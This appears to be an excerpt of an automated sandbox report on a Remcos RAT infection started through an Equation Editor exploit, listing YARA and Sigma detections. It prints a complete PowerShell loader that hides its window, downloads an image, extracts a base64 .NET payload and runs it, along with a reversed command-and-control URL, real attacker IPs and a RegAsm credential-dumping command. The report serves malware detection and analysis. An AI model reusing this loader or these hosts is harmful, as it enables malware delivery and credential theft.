              12.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                12.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  12.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    Click to see the 19 entries

                    Sigma Signatures

                    Exploits

                    barindex
                    Sigma detected: EQNEDT32.EXE connecting to internet
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 85.239.241.184, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3680, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
                    Sigma detected: File Dropped By EQNEDT32EXE
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3680, TargetFilename: C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                    Sigma detected: Equation Editor Network Connection
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3680, Protocol: tcp, SourceIp: 85.239.241.184, SourceIsIpv6: false, SourcePort: 80
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                    Sigma detected: Suspicious Microsoft Office Child Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , ProcessId: 3744, ProcessName: wscript.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , ProcessId: 3744, ProcessName: wscript.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                    Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3988, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu", ProcessId: 4084, ProcessName: RegAsm.exe
                    Sigma detected: Suspicious Office Outbound Connections
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3320, Protocol: tcp, SourceIp: 95.217.202.210, SourceIsIpv6: false, SourcePort: 80
                    Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 